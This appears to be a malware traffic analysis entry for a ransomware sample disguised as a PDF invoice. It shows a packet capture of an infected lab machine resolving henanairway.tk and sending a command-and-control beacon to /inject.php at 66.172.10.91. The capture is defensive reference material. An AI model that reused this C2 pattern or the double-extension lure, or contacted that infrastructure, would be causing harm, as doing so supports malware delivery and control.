Razy/Ransomware Invoice20J-801265.pdf.exe Malware Traffic Analysis PCAP file download henanairway.tk

016-09-08 04:30:30.266897 IP 192.168.56.14.51454 > 8.8.8.8.53: 37485+ A? www.henanairway.tk. (36)
E..@……1     ..8……..5.,.).m………..www.henanairway.tk…..
2016-09-08 04:30:30.295267 IP 8.8.8.8.53 > 192.168.56.14.51454: 37485 1/0/0 A 66.172.10.91 (52)
E..P1r..1.Oe……8..5…<.C.m………..www.henanairway.tk…………..+..B.
[
2016-09-08 04:30:30.376181 IP 192.168.56.14.49260 > 66.172.10.91.80: Flags [S], seq 4003209582, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….’..8.B.
[.l.P..!n…… .8……………
2016-09-08 04:30:30.533606 IP 66.172.10.91.80 > 192.168.56.14.49260: Flags [S.], seq 1998528983, ack 4003209583, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
EH.4..@./…B.
[..8..P.lw.!…!o..r.Mt…………..
2016-09-08 04:30:30.533788 IP 192.168.56.14.49260 > 66.172.10.91.80: Flags [.], ack 1, win 256, length 0
E..(..@….2..8.B.
[.l.P..!ow.!.P….V..
2016-09-08 04:30:30.557745 IP 192.168.56.14.49260 > 66.172.10.91.80: Flags [P.], seq 1:139, ack 1, win 256, length 138: HTTP: GET /inject.php?inject=3AsPWx5-cysNgg1tG-Y6&hm27mV7mPa8t(8jI
3Q-0A00270F1AD9 HTTP/1.1
E…..@…….8.B.
[.l.P..!ow.!.P…….GET /inject.php?inject=3AsPWx5-cysNgg1tG-Y6&hm27mV7mPa8t(8jI3Q-0A00270F1AD9 HTTP/1.1
Host: www.henanairway.tk
Connection: Keep-Alive